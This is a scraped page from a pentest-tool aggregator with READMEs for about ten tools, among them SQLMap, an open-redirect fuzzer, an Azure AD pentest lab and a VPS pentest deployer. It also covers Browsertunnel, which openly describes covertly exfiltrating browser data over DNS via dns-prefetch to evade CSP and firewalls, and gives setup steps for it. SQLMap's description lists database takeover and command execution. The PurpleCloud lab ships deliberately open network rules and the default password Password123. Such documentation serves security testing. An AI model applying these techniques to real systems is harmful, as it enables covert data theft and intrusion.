Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Hardcodes - Find Hardcoded Strings From Source Code

$
0
0

hardcodes is a utility for searching strings hardcoded by developers in programs. It uses a modular tokenizer that can handle comments, any number of backslashes & nearly any syntax you throw at it.
Yes, it is designed to process any syntax and following languages are officially supported:
ada, applescript, c, c#, c++, coldfusion, golang, haskell, html, java, javascript,
jsp, lua, pascal, perl, php, powershell, python, ruby, scala, sql, swift, xml

Installation

with pip
pip3 install hardcodes

or build from source
git clone https://github.com/s0md3v/hardcodes && cd hardcodes && python3 setup.py install

For Developers
The sample program below demonstrates usage of hardcodes library
from hardcodes import search

string = "console.log('hello there')"
result = search(string, lang="common", comments="parse")
print(result)
Output: ['hello there']
The arguments lang and comments are optional. Their use is explained below in the user documentation section.

For Users
cli.py provides a grep-like command line interface to hardcodes library. You will need to install the library first to use it.

Find strings in a file
python cli.py /path/to/file.ext

Find strings in a directory, recursively
python cli.py -r /path/to/dir

Hide paths from output
python cli.py -o /path/to/file.ext

Specify programming language
Specifying a language is optional and should be used only when the programming language of source is already known.
python cli.py -l 'golang' /path/to/file.go

Specify comment behaviour
With -c option, you can specify
  • ignore ignore the comments completely
  • parse parse the comments like code
  • string add comments to list of hardcoded strings
python cli.py -o /path/to/file.ext



VPS-Docker-For-Pentest - Create A VPS On Google Cloud Platform Or Digital Ocean Easily With The Docker For Pentest

$
0
0

Create a VPS on Google Cloud Platform or Digital Ocean easily with the docker for pentest included to launch the assessment to the target.

Requirements
  • Terraform installed
  • Ansible installed
  • SSH private and public keys
  • Google Cloud Platform or Digital Ocean account.

Usage

1.- Clone the repository
git clone --depth 1 https://github.com/aaaguirrep/vps-docker-for-pentest.git vps
cd vps

2.- Credentials

For Google Cloud Platform
  • Create a new project.
  • Create service account with "Compute Admin" role and download a key in json format in credentials folder.
  • Rename the key to pentest.json
  • Enable "Compute Engine API" for the project.

For Digital Ocean
  • Create a Personal access tokens with write permission and copy it. See Tutorial

SSH Private and Public keys
  • Inside credentials folder run ssh-keygen -t rsa -f pentest in the terminal. Empty passphrase is ok.
  • It creates two files: private and public key.

3.- Terraform

Google Cloud Platform
  • Enter to gcp folder and modify the next value:
    • In main.tf file change the project value with your project-id.
  • Run the next commands:
# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x
  • Copy the external_ip value
Note: The instance type and the region used are: n1-standard-1 and us-central1. You can change the values on server.tf and main.tf
Demo

Digital Ocean
  • Enter to digital-ocean folder
  • With the personal access token copied run export TF_VAR_do_token="Personal_Access_Token_Here"
  • Run the next commands:
# Initialize terraform provider
$ terraform init
Terraform has been successfully initialized!

# Create the resources
$ terraform apply -auto-approve
Apply complete! Resources: 3 added, 0 changed, 0 destroyed.
Outputs:
external_ip = x.x.x.x
  • Copy the external_ip value
Note: The droplet type and the region used are: s-2vcpu-4gb and nyc3. You can change the values on server.tf and variables.tf
Demo

4.- Ansible
  • Enter to ansible folder
  • In hosts.yaml change the x.x.x.x by external_ip value copied.
  • Run the next command:
$ ansible-playbook playbook.yaml
TASK [Configuration finished] *******************************************************
ok: [x.x.x.x] => {
"msg": "System configured correctly."
}
Demo

5.- Access to VPS
  • In gcp or digital-ocean folder run the next command. Change x.x.x.x by external_ip value copied.
# Access to VPS
$ ssh pentest@x.x.x.x -i ../credentials/pentest
Demo

6.- Destroy the VPS
  • In gcp or digital-ocean folder run the next command.
# Destroy the resource
$ terraform destroy -auto-approve
Note: For Digital Ocean, if you dont have a default VPC created in the region used it shows an error to destroy the VPC but no problem, it will destroy the others resources.



Autovpn - Create On Demand Disposable OpenVPN Endpoints On AWS

$
0
0

Script that allows the easy creation of OpenVPN endpoints in any AWS region. To create a VPN endpoint is done with a single command takes ~3 minutes. It will create the proper security groups. It spins up a tagged ec2 instance and configures OpenVPN software. Once instance is configured an OpenVPN configuration file is downloaded and ready to use. There is also functionality to see which instances are running in which region and ability to terminate the instance when done. Additional functionality includes specifying instance type, generate ssh keypairs, specify custom ami, change login user and more to come.

Use Case
  • Create on demand OpenVPN Endpoints in AWS that can easily be destroyed after done only pay for what you use.

Dependencies
  1. Create a virtualenv:
mkvirtualenv -p python3 env/
source env/bin/activate
  1. Install dependencies by running pip install -r requirements.txt
  2. Ensure that you have an AWS .credentials file by running:
vi ~/.aws/credentials
Then type in the following and add your keys (remove parenthesis):
[default]
aws_access_key_id = (your_access_key_here)
aws_secret_access_key = (your_secret_key_here)
  1. Install OpenVPN client (if needed)

Installation
  1. Ensure dependencies are all installed.
  2. Clone repo to system.
git clone https://github.com/ttlequals0/autovpn.git
  1. To create SSH keypair execute autovpn with -G and -r options for AWS region of choice. (optional) NOTE: Make sure to add new key to your ssh-agent.
./autovpn -G -r us-east-1
  1. Execute autovpn with -C -k and -r options to deploy to AWS:
./autovpn -C -r us-east-1 -k us-east-1_vpnkey
  1. OpenVPN config files are downloaded to current working directory.
  2. Import the OpenVPN config file and connect:
sudo openvpn us-east-1_aws_vpn.ovpn

Man page
DESCRIPTION:
autovpn - On Demand AWS OpenVPN Endpoint Deployment Tool.
Project found at https://github.com/ttlequals0/autovpn
USAGE:
ACTION [OPTIONS]
-C Create VPN endpoint.
-D Delete keypair from region.
-G Generate new keypair.
-S Get all running instances in a given region.
-T Terminate a OpenVPN endpoint.
-d Specify custom DNS server. (ex. 4.2.2.1)
-h Displays this message.
-i AWS Instance type (Optional, Default is t2.micro)
t2.nano t2.micro t2.small t2.medium t2.large.**
-k Specify the name of AWS keypair (Required)
-m Allow multiple connections to same endpoint.
-r Specify AWS Region (Required)
us-east-1 us-west-1 us-east-2 us-west-2 eu-west-1 eu-west-2
eu-west-3 eu-central-1 eu-north-1 ap-southeast-1 ap-northeast-1
ap-northeast-2 ap-northeast-3 ap-southeast-2 sa-east-1
ap-east-1 ca-central-1 me-south-1
-p Specify custom OpenVPN UDP port
-u Specify custom ssh user.***
-y Skip confirmations
-z Specify instance id.
EXAMPLES:
Create OpenVPN endpoint:
autovpn -C -r us-east-1 -k us-east-1_vpnkey
Generate keypair in a region.
autovpn -G -r us-east-1
Get running instances
autovpn -S -r us-east-1
Terminate OpenVPN endpoint
autovpn -T -r us-east-1 -z i-b933e00c
Using custom options
autovpn -C -r us-east-1 -k us-east-1_vpnkey -a ami-fce3c696 -u ec2_user -i m3.medium
NOTES:
* - Custom AMI may be needed if changing instance type.
** - Any instance size can be given but the t2.micro is more than enough.
*** - Custom user might be need if using a custom ami.
**** - AWS IAM u ser must have EC2 or Administrator permissions set.

To Do
  • Continue to update documentation
  • Add deletion of Securoty Group if it is no longer in use.
  • Add ability to create more client configs for one endpoint.
  • Pull Requests are welcome.


SQLMap v1.4.9 - Automatic SQL Injection And Database Takeover Tool

$
0
0

SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
  • Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Installation
You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

Usage
To get a list of basic options and switches use:
python sqlmap.py -h
To get a list of all options and switches use:
python sqlmap.py -hh
You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.

Links


OpenRedireX - Asynchronous Open redirect Fuzzer for Humans

$
0
0

A Fuzzer For OpenRedirect Issues.

Key Features :
  • Takes a url or list of urls and fuzzes them for Open redirect issues
  • You can specify your own payloads in 'payloads.txt'
  • Shows Location header history (if any)
  • Fast (as it is Asynchronous)
  • umm thats it , nothing much !

Usage :
Note : Use Python 3.7+ !
$ git clone https://github.com/devanshbatham/OpenRedireX
$ cd OpenRedireX
$ python3 -m venv env
$ source env/bin/activate
Note : The "FUZZ" is important and the url must be in double qoutes !
$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

For single URL :
$ python3.7 openredirex.py -u "https://vulnerable.com/?url=FUZZ" -p payloads.txt --keyword FUZZ

For List of URLs :
$ python3.7 openredirex.py -l urls.txt -p payloads.txt --keyword FUZZ

Example :


Credits :
Thanks mate @NullPxl


PurpleCloud - An Infrastructure As Code (IaC) Deployment Of A Small Active Directory Pentest Lab In The Cloud

$
0
0

Pentest Cyber Range for a small Active Directory Domain. Automated templates for building your own Pentest/Red Team/Cyber Range in the Azure cloud! Purple Cloud is a small Active Directory enterprise deployment automated with Terraform / Ansible Playbook templates to be deployed in Azure. Purple Cloud also includes an adversary node implemented as a docker container remotely accessible over RDP.

Quick Fun Facts:
  • Deploys a pentest adversary Linux VM and Docker container (AriaCloud) accessible over RDP
  • Deploys one (1) Windows 2019 Domain Controller and three (3) Windows 10 Pro Endpoints
  • Automatically joins the three Windows 10 computers to the AD Domain
  • Uses Terraform templates to automatically deploy in Azure with VMs
  • Terraform templates write Ansible Playbook configuration, which can be customized
  • Automatically uploads Badblood (but does not install) if you prefer to generate thousands of simulated users https://github.com/davidprowe/BadBlood
  • Post-deployment Powershell script provisions three domain users on the 2019 Domain Controller and can be customized for many more
  • Domain Users: olivia (Domain Admin); lars (Domain User); liem (Domain User)
  • All Domain User passwords: Password123
  • Domain: RTC.LOCAL
  • Domain Administrator Creds: RTCAdmin:Password123
  • Deploys four IP subnets
  • Deploys intentionally insecure Azure Network Security Groups (NSGs) that allow RDP, WinRM (5985, 5986), and SSH from the Public Internet. Secure this as per your requirements. WinRM is used to automatically provision the hosts.
  • Post-deploy Powershell script that adds registry entries on each Windows 10 Pro endpoint to automatically log in each username into the Domain as respective user. This feature simulates a real AD environment with workstations with interactive domain logons. When you attempt to RDP into the endpoints, simulated adversary is met with:

AriaCloud Pentest Container - Automated Deployment
This repo now includes a Terraform template and Ansible Playbook that automatically deploys AriaCloud into an Azure VM with remote access over RDP. You can also do a standalone deployment of AriaCloud from within this repo. For this option, navigate into the aria-cloud directory and see the README. For more information on the AriaCloud docker container and included pentest tools, navigate to https://github.com/iknowjason/AriaCloud.

Purple Cloud Deployment Instructions
Note: Tested on Ubuntu Linux 20.04
Requirements:
  • Azure subscription
  • Terraform: Tested on v0.12.26
  • Ansible: Tested on 2.9.6

Installation Steps
Note: Tested on Ubuntu 20.04
Step 1: Install Terraform and Ansible on your Linux system
Download and install Terraform for your platform --> https://www.terraform.io/downloads.html
Install Ansible
$ sudo apt-get install ansible
Step 2: Set up an Azure Service Principal on your Azure subscription that allows Terraform to automate tasks under your Azure subscription
Follow the exact instructions in this Microsoft link: https://docs.microsoft.com/en-us/azure/developer/terraform/getting-started-cloud-shell
These were the two basic commands that were run based on this link above:
az ad sp create-for-rbac --role="Contributor" --scopes="/subscriptions/<subscription_id>
and this command below. From my testing I needed to use a role of "Owner" instead of "Contributor". Default Microsoft documentation shows role of "Contributor" which resulted in errors.
az login --service-principal -u <service_principal_name> -p "<service_principal_password>" --tenant "<service_principal_tenant>"
Take note of the following which we will use next to configure our Terraform Azure provider:
subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""
Step 3: Clone this repo
$ git clone https://github.com/iknowjason/PurpleCloud.git
Step 4: Using your favorite text editor, edit the terraform.tfvars file for the Azure resource provider matching your Azure Service Principal credentials
cd PurpleCloud/deploy
vi terraform.tfvars
Edit these parameters in the terraform.tfvars file:
subscription_id = ""
client_id = ""
client_secret = ""
tenant_id = ""
Your terraform.tfvars file should look similar to this but with your own Azure Service Principal credentials:
subscription_id = "aa9d8c9f-34c2-6262-89ff-3c67527c1b22"
client_id = "7e9c2cce-8bd4-887d-b2b0-90cd1e6e4781"
client_secret = ":+O$+adfafdaF-?%:.?d/EYQLK6po9`|E<["
tenant_id = "8b6817d9-f209-2071-8f4f-cc03332847cb"
Step 5: Run the commands to initialize terraform and apply the resource plan
$ cd PurpleCloud/deploy
$ terraform init
$ terraform apply -var-file=terraform.tfvars -auto-approve
This should start the Terraform automated deployment plan
Step 6: Optional: Unzip and run Badblood from C:\terraform directory (https://github.com/davidprowe/BadBlood)

Known Issues or Bugs
There are issues that are WIP for me to debug and resolve based on timing. They are mentioned below with workarounds.
Sometimes one of the provisioning steps doesn't work with the DC. It is the terraform module that calls the Ansible Playbook which runs a Powershell script to add domain users. The error will look like this when running the steps:
module.dc1-vm.null_resource.provision-dc-users (local-exec): TASK [dc : debug] **************************************************************
module.dc1-vm.null_resource.provision-dc-users (local-exec): ok: [52.255.151.90] => {
module.dc1-vm.null_resource.provision-dc-users (local-exec): "results.stdout_lines": [
module.dc1-vm.null_resource.provision-dc-users (local-exec): "WARNING: Error initializing default drive: 'Unable to find a default server with Active Directory Web Services ",
module.dc1-vm.null_resource.provision-dc-users (local-exec): "running.'."
module.dc1-vm.null_resource.provision-dc-users (local-exec): ]
module.dc1-vm.null_resource.provision-dc-users (local-exec): }
If this happens, you can change into the modules/dc1-vm directory and immediately run the ansible playbook commands, as shown in README.ANSIBLE.txt: ansible-playbook -i hosts.cfg playbook.yml
If you run this command before the Windows 10 endpoints are provisioned, they will run just fine. If the entire script runs and you see this error, then you need to run the Ansible Playbook on the Windows server and all of the endpoints.
Sometimes the adversary will throw this error:
module.adversary1-vm.null_resource.ansible-deploy (local-exec): fatal: [40.121.138.118]: FAILED! => {"changed": false, "msg": "Failed to update apt cache: "}
To resolve the issue, change into the modules/adversary1-vm directory and run the Ansible Playbook commands shown in README.ANSIBLE.txt:
ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook -i ./hosts.cfg --private-key ssh_key.pem ./playbook.yml
Sometimes the Windows 10 Endpoints don't automatically log into the domain via registry entry. I've traced this issue to a timing issue with the Domain Controller creation. The powershell script creating the three users does not run correctly. To resolve the issue, simply run the Ansible Playbooks in each module directory. The following should resolve the issue:
$ cd ../modules/dc1-vm/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-1/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-2/
$ ansible-playbook -i hosts.cfg playbook.yml

$ cd ../win10-vm-3/
$ ansible-playbook -i hosts.cfg playbook.yml

Credits
@ghostinthewires for his Terraform templates (https://github.com/ghostinthewires)
@mosesrenegade for his Ansible Playbook integration with Terraform + Powershell script (https://github.com/mosesrenegade)
@davidprowe for his Badblood (https://github.com/davidprowe/BadBlood)

Future Development
  • AWS Terraform Deployment
  • Blue Team - Endpoint visibility with Sysmon on endpoints
  • Blue Team - Endpoint visibility with Velociraptor agent on endpoints


Bpytop - Linux/OSX/FreeBSD Resource Monitor

$
0
0

Resource monitor that shows usage and stats for processor, memory, disks, network and processes.
Python port of bashtop.

Features
  • Easy to use, with a game inspired menu system.
  • Full mouse support, all buttons with a highlighted key is clickable and mouse scroll works in process list and menu boxes.
  • Fast and responsive UI with UP, DOWN keys process selection.
  • Function for showing detailed stats for selected process.
  • Ability to filter processes, multiple filters can be entered.
  • Easy switching between sorting options.
  • Send SIGTERM, SIGKILL, SIGINT to selected process.
  • UI menu for changing all config file options.
  • Auto scaling graph for network usage.
  • Shows message in menu if new version is available
  • Shows current read and write speeds for disks

Themes
Bpytop uses the same theme files as bashtop so any theme made for bashtop will work.
See themes folder for available themes.
The make install command places the default themes in /usr/local/share/bpytop/themes. User created themes should be placed in $HOME/.config/bpytop/themes.
Let me know if you want to contribute with new themes.

Support and funding
You can sponsor this project through github, see my sponsors page for options.
Or donate through paypal or ko-fi.
Any support is greatly appreciated!

Prerequisites

Mac Os X
Will not display correctly in the standard terminal! Recommended alternative iTerm2
Will also need to be run as superuser to display stats for processes not owned by user.

Linux, Mac Os X and FreeBSD
For correct display, a terminal with support for:
Also needs a UTF8 locale and a font that covers:
  • Unicode Block “Braille Patterns” U+2800 - U+28FF
  • Unicode Block “Geometric Shapes” U+25A0 - U+25FF
  • Unicode Block "Box Drawing" and "Block Elements" U+2500 - U+259F

Notice
Dropbear seems to not be able to set correct locale. So if accessing bpytop over ssh, OpenSSH is recommended.

Dependencies
Python3 (v3.6 or later)
psutil module (v5.7.0 or later)

Optionals for additional stats
(Optional OSX) osx-cpu-temp Needed to show CPU temperatures.

Screenshots
Main UI showing details for a selected process.

Main UI in mini mode.

Main menu.

Options menu.

Installation
PyPi packaging for installation with pip will be setup later.
If you want to help speed this up, help with setting up proper testing is welcome!

Dependencies installation Linux
Install python3 and git with a package manager of you choice
Install psutil python module (sudo might be required)
python3 -m pip install psutil

Dependencies installation OSX
Install homebrew if not already installed
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"
Install python3 if not already installed
brew install python3 git
Install psutil python module
python3 -m pip install psutil
Install optional dependency osx-cpu-temp
brew install osx-cpu-temp

Dependencies installation FreeBSD
Install with pkg and pip
sudo pkg install python3 git
sudo python3 -m ensurepip
sudo python3 -m pip install psutil

Manual installation Linux, OSX and FreeBSD
Clone and install
git clone https://github.com/aristocratos/bpytop.git
cd bpytop
sudo make install
to uninstall it
sudo make uninstall

Configurability
All options changeable from within UI. Config files stored in "$HOME/.config/bpytop" folder

bpytop.cfg: (auto generated if not found)
"/etc/bpytop.conf" will be used as default seed for config file creation if it exists.
#? Config file for bpytop v. 1.0.0

#* Color theme, looks for a .theme file in "/usr/[local/]share/bpytop/themes" and "~/.config/bpytop/themes", "Default" for builtin default theme.
#* Prefix name by a plus sign (+) for a theme located in user themes folder, i.e. color_theme="+monokai"
color_theme="Default"

#* Update time in milliseconds, increases automatically if set below internal loops processing time, recommended 2000 ms or above for better sample times for graphs.
update_ms=2000

#* Processes sorting, "pid" "program" "arguments" "threads" "user" "memory" "cpu lazy" "cpu responsive",
#* "cpu lazy" updates top process over time, "cpu responsive" updates top process directly.
proc_sorting="cpu lazy"

#* Reverse sorting order, True or False.
proc_reversed=False

#* Show processes as a tree
proc_tree=False

#* Use the cpu graph colors in the process list.
proc_colors=True

#* Use a darkening gradient in the process list.
proc_gradient=True

#* If process cpu usage should be of the core it's running on or usage of the total available cpu power.
proc_per_core=False

#* Check cpu temperature, needs "vcgencmd" on Raspberry Pi and "osx-cpu-temp" on MacOS X.
check_temp=True

#* Draw a clock at top of screen, formatting according to strftime, empty string to disable.
draw_clock="%X"

#* Update main ui in background when menus are showing, set this to false if the menus is flickering too much for comfort.
background_update=True

#* Custom cpu model name, empty string to disable.
custom_cpu_name=""

#* Opti onal filter for shown disks, should be last folder in path of a mountpoint, "root" replaces "/", separate multiple values with comma.
#* Begin line with "exclude=" to change to exclude filter, oterwise defaults to "most include" filter. Example: disks_filter="exclude=boot, home"
disks_filter=""

#* Show graphs instead of meters for memory values.
mem_graphs=True

#* If swap memory should be shown in memory box.
show_swap=False

#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=True

#* If mem box should be split to also show disks info.
show_disks=True

#* Show init screen at startup, the init screen is purely cosmetical
show_init=True

#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=True

#* Enable start in mini mode, can be toggled with shift+m at any time.
mini_mode=False

#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=WARNING

Command line options: (not yet implemented)
USAGE: bpytop [argument]    Arguments:      -m, --mini            Start in minimal mode without memory and net boxes      -v, --version         Show version info and exit      -h, --help            Show this help message and exit      --debug               Start with loglevel set to DEBUG overriding value set in config  

TODO


Browsertunnel - Surreptitiously Exfiltrate Data From The Browser Over DNS

$
0
0
Browsertunnel is a tool for exfiltrating data from the browser using the DNS protocol. It achieves this by abusing dns-prefetch, a feature intended to reduce the perceived latency of websites by doing DNS lookups in the background for specified domains. DNS traffic does not appear in the browser's debugging tools, is not blocked by a page's Content Security Policy (CSP), and is often not inspected by corporate firewalls or proxies, making it an ideal medium for smuggling data in constrained scenarios.
It's an old technique—DNS tunneling itself dates back to the '90s, and Patrick Vananti wrote about using dns-prefetch for it in 2016, but as far as I can tell, browsertunnel is the first open source, production-ready client/server demonstrating its use. Because dns-prefetch does not return any data back to client javascript, communication through browsertunnel is only unidirectional. Additionally, some browsers disable dns-prefetch by default, and in those cases, browsertunnel will silently fail.


The project comes in two parts:
  1. A server, written in golang, functions as an authoritative DNS server which collects and decodes messages sent by browsertunnel.
  2. A small javascript library, found in the html/ folder, encodes and sends messages from the client side.

How it works
Browsertunnel can send arbitrary strings over DNS by encoding the string in a subdomain, which is forwarded to the browsertunnel server when the browser attempts to recursively resolve the domain.

Longer messages that cannot fit in one domain (253 bytes) are automatically split into multiple queries, which are reassembled and decoded by the server.

Setup and usage
First, set up DNS records to delegate a subdomain to your server. For example, if your server's IP is 192.0.2.123 and you want to tunnel through the subdomain t1.example.com, then your DNS configuration will look like this:
t1  IN NS t1ns.example.com.
t1ns IN A 192.0.2.123
On your server, install browsertunnel using go get. Alternatively, compile browsertunnel on your own machine, and copy the binary to your server.
go get github.com/veggiedefender/browsertunnel
Next, run browsertunnel, specifying the subdomain you want to tunnel through.
browsertunnel t1.example.com
For full usage, run browsertunnel -help:
$ browsertunnel -help
Usage of browsertunnel:
-deletionInterval int
seconds in between checks for expired messages (default 5)
-expiration int
seconds an incomplete message is retained before it is deleted (default 60)
-maxMessageSize int
maximum encoded size (in bytes) of a message (default 5000)
-port int
port to run on (default 53)
For more detailed descriptions and rationale for these parameters, you may also consult the godoc.
Finally, test out your tunnel! You can use my demo page here or clone this repo and load html/index.html locally. If everything works, you should be able to see messages logged to stdout.
For real-world applications of this project, you may want to fork and tweak the code as you see fit. Some inspiration:
  • Write messages to a database instead of printing them to stdout
  • Transpile or rewrite the client code to work with older browsers
  • Make the ID portion of the domain larger or smaller, depending on the amount of traffic you get, and ID collisions you expect
  • Authenticate and encrypt messages for secrecy and tamper-resistance (remember that DNS is a plaintext protocol)



Rakkess - Kubectl Plugin To Show An Access Matrix For K8S Server Resources

$
0
0

Review Access - kubectl plugin to show an access matrix for server resources

Intro
Have you ever wondered what access rights you have on a provided kubernetes cluster? For single resources you can use kubectl auth can-i list deployments, but maybe you are looking for a complete overview? This is what rakkess is for. It lists access rights for the current user and all server resources, similar to kubectl auth can-i --list.
It is also useful to find out who may interact with some server resource. Check out the sub-command rakkess resourcebelow.

Examples

Show access for all resources
  • ... at cluster scope
    rakkess
  • ... in some namespace
    rakkess --namespace default
  • ... with verbs
    rakkess --verbs get,delete,watch,patch
  • ... for another user
    rakkess --as other-user
  • ... for another service-account
    rakkess --sa kube-system:namespace-controller
  • ... and combine with common kubectl parameters
    KUBECONFIG=otherconfig rakkess --context other-context

Show subjects with access to a given resource1

  • ...globally in all namespaces (only considers ClusterRoleBindings)
    rakkess resource configmaps
  • ...in a given namespace (considers RoleBindings and ClusterRoleBindings)
    rakkess resource configmaps -n default
  • ...with shorthand notation
    rakkess r cm   # same as rakkess resource configmaps
  • .. with custom verbs
    rakkess r cm --verbs get,delete,watch,patch

Name-restricted roles
Some roles only apply to resources with a specific name. To review such configurations, provide the resource name as additional argument. For example, show access rights for the ConfigMap called ingress-controller-leader-nginx in namespace ingress-nginx (note the subtle difference for nginx-ingress-serviceaccount to the previous example):


As rakkess resource needs to query Roles, ClusterRoles, and their bindings, it usually requires administrative cluster access.
Also see Usage.

Installation
There are several ways to install rakkess. The recommended installation method is via krew.

Via krew
Krew is a kubectl plugin manager. If you have not yet installed krew, get it at https://github.com/kubernetes-sigs/krew. Then installation is as simple as
kubectl krew install access-matrix
The plugin will be available as kubectl access-matrix, see doc/USAGE for further details.

Binaries
When using the binaries for installation, also have a look at doc/USAGE.

Linux
curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-linux.tar.gz \
&& tar xf rakkess-amd64-linux.tar.gz rakkess-amd64-linux \
&& chmod +x rakkess-amd64-linux \
&& mv -i rakkess-amd64-linux $GOPATH/bin/rakkess

OSX
curl -LO https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-amd64-darwin.tar.gz \
&& tar xf rakkess-amd64-darwin.tar.gz rakkess-amd64-darwin \
&& chmod +x rakkess-amd64-darwin \
&& mv -i rakkess-amd64-darwin $GOPATH/bin/rakkess

Windows
https://github.com/corneliusweig/rakkess/releases/download/v0.4.4/rakkess-windows-amd64.zip

From source

Build on host
Requirements:
  • go 1.13 or newer
  • GNU make
  • git
Compiling:
export PLATFORMS=$(go env GOOS)
make all # binaries will be placed in out/

Build in docker
Requirements:
  • docker
Compiling:
mkdir rakkess && chdir rakkess
curl -Lo Dockerfile https://raw.githubusercontent.com/corneliusweig/rakkess/master/Dockerfile
docker build . -t rakkess-builder
docker run --rm -v $PWD:/go/bin/ --env PLATFORMS=$(go env GOOS) rakkess
docker rmi rakkess-builder
Binaries will be placed in the current directory.

Users
What are others saying about rakkess?
“Well, that looks handy! rakkess, a kubectl plugin to show an access matrix for all available resources.”@mhausenblas
“that's indeed pretty helpful. rakkess --as system:serviceaccount:my-ns:my-sa -n my-ns prints the access matrix of a service account in a namespace”@fakod
“THE BOMB. Love it.”@ralph_squillace
“This made my day. Well, not actually today but I definitively will use it a lot.”@Soukron

[1]: This mode was inspired by kubectl-who-can


Anchore Engine - A Service That Analyzes Docker Images And Applies User-Defined Acceptance Policies To Allow Automated Container Image Validation And Certification

$
0
0

For the most up-to-date information on Anchore Engine, Anchore CLI, and other Anchore software, please refer to the Anchore Documentation
The Anchore Engine is an open-source project that provides a centralized service for inspection, analysis, and certification of container images. The Anchore Engine is provided as a Docker container image that can be run standalone or within an orchestration platform such as Kubernetes, Docker Swarm, Rancher, Amazon ECS, and other container orchestration platforms.
The Anchore Engine can be accessed directly through a RESTful API or via the Anchore CLI.
With a deployment of Anchore Engine running in your environment, container images are downloaded and analyzed from Docker V2 compatible container registries and then evaluated against user-customizable policies to perform security, compliance, and best practices enforcement checks.

Anchore Engine can be used in several ways:
  • Standalone or interactively.
  • As a service integrated with your CI/CD to bring security/compliance/best-practice enforcement to your build pipeline
  • As a component integrated into existing container monitoring and control frameworks via integration with its RESTful API.
Anchore Engine is also the OSS foundation for Anchore Enterprise, which adds a graphical UI (providing policy management, user management, a summary dashboard, security and policy evaluation reports, and many other graphical client controls), and other back-end features and modules.
Supported Operating Systems
  • Alpine
  • Amazon Linux 2
  • CentOS
  • Debian
  • Google Distroless
  • Oracle Linux
  • Red Hat Enterprise Linux
  • Red Hat Universal Base Image (UBI)
  • Ubuntu
Supported Packages
  • GEM
  • Java Archive (jar, war, ear)
  • NPM
  • Python (PIP)

Installation
There are several ways to get started with Anchore Engine, for the latest information on quickstart and full production installation with docker-compose, Helm, and other methods, please visit:
The Anchore Engine is distributed as a Docker Image available from DockerHub.

Quick Start (TLDR)
See documentation for the full quickstart guide.
To quickly bring up an installation of Anchore Engine on a system with docker (and docker-compose) installed, follow these simple steps:
curl https://docs.anchore.com/current/docs/engine/quickstart/docker-compose.yaml > docker-compose.yaml
docker-compose up -d
Once the Engine is up and running, you can begin to interact with the system using the CLI.

Getting Started using the CLI
The Anchore CLI is an easy way to control and interact with the Anchore Engine.
The Anchore CLI can be installed using the Python pip command, or by running the CLI from the Anchore Engine CLI container image. See the Anchore CLI project on Github for code and more installation options and usage.

CLI Quick Start (TLDR)
By default, the Anchore CLI tries to connect to the Anchore Engine at http://localhost:8228/v1 with no authentication. The username, password, and URL for the server can be passed to the Anchore CLI as command-line arguments:
--u   TEXT   Username     eg. admin
--p TEXT Password eg. foobar
--url TEXT Service URL eg. http://localhost:8228/v1
Rather than passing these parameters for every call to the tool, they can also be set as environment variables:
ANCHORE_CLI_URL=http://myserver.example.com:8228/v1
ANCHORE_CLI_USER=admin
ANCHORE_CLI_PASS=foobar
Add an image to the Anchore Engine:
anchore-cli image add docker.io/library/debian:latest
Wait for the image to move to the 'analyzed' state:
anchore-cli image wait docker.io/library/debian:latest
List images analyzed by the Anchore Engine:
anchore-cli image list
Get image overview and summary information:
anchore-cli image get docker.io/library/debian:latest
List feeds and wait for at least one vulnerability data feed sync to complete. The first sync can take some time (20-30 minutes) after that syncs will only merge deltas.
anchore-cli system feeds list
anchore-cli system wait
Obtain the results of the vulnerability scan on an image:
anchore-cli image vuln docker.io/library/debian:latest os
List operating system packages present in an image:
anchore-cli image content docker.io/library/debian:latest os
Perform a policy evaluation against an image using the default policy:
